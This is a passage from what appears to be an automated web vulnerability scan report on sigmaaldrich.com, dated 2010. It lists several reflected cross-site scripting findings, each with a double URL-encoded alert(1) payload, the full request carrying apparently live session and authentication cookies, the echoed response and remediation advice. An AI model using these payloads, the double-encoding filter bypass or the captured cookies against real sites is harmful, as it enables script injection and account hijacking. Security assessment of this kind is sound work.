P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:29 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/de631";alert(1)//6a1d1e6ced9","E404") ;
   </script>
...[SNIP]...

1.533. http://www.sigmaaldrich.com/life-science/cell-culture.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/cell-culture.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffa01%2522%253balert%25281%2529%252f%252fe7437acb32f was submitted in the REST URL parameter 1. This input was echoed as ffa01";alert(1)//e7437acb32f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-scienceffa01%2522%253balert%25281%2529%252f%252fe7437acb32f/cell-culture.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:25 GMT
Content-Length: 28934
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-scienceffa01";alert(1)//e7437acb32f/cell-culture.html","E404") ;
   </script>
...[SNIP]...

1.534. http://www.sigmaaldrich.com/life-science/cell-culture.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/cell-culture.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97e93%2522%253balert%25281%2529%252f%252f25b8e28cfa6 was submitted in the REST URL parameter 2. This input was echoed as 97e93";alert(1)//25b8e28cfa6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/97e93%2522%253balert%25281%2529%252f%252f25b8e28cfa6 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/97e93";alert(1)//25b8e28cfa6","E404") ;
   </script>
...[SNIP]...

1.535. http://www.sigmaaldrich.com/life-science/core-bioreagents.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/core-bioreagents.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a00d4%2522%253balert%25281%2529%252f%252f55377115b5 was submitted in the REST URL parameter 1. This input was echoed as a00d4";alert(1)//55377115b5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencea00d4%2522%253balert%25281%2529%252f%252f55377115b5/core-bioreagents.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:25 GMT
Content-Length: 28937
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencea00d4";alert(1)//55377115b5/core-bioreagents.html","E404") ;
   </script>
...[SNIP]...

1.536. http://www.sigmaaldrich.com/life-science/core-bioreagents.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/core-bioreagents.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 54f66%2522%253balert%25281%2529%252f%252ff8e1dc82aa8 was submitted in the REST URL parameter 2. This input was echoed as 54f66";alert(1)//f8e1dc82aa8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-science/54f66%2522%253balert%25281%2529%252f%252ff8e1dc82aa8 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:27 GMT
Content-Length: 28917
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-science/54f66";alert(1)//f8e1dc82aa8","E404") ;
   </script>
...[SNIP]...

1.537. http://www.sigmaaldrich.com/life-science/custom-oligos.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/custom-oligos.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ab%2522%253balert%25281%2529%252f%252fa5d314c50df was submitted in the REST URL parameter 1. This input was echoed as c50ab";alert(1)//a5d314c50df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /life-sciencec50ab%2522%253balert%25281%2529%252f%252fa5d314c50df/custom-oligos.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:28 GMT
Content-Length: 28935
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/life-sciencec50ab";alert(1)//a5d314c50df/custom-oligos.html","E404") ;
   </script>
...[SNIP]...

1.538. http://www.sigmaaldrich.com/life-science/custom-oligos.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /life-science/custom-oligos.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20420%2522%253balert%25281%2529%252f%252f86b2e897c21 was submitted in the REST URL parameter 2. This input was echoed as 20420";alert(1)//86b2e897c21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

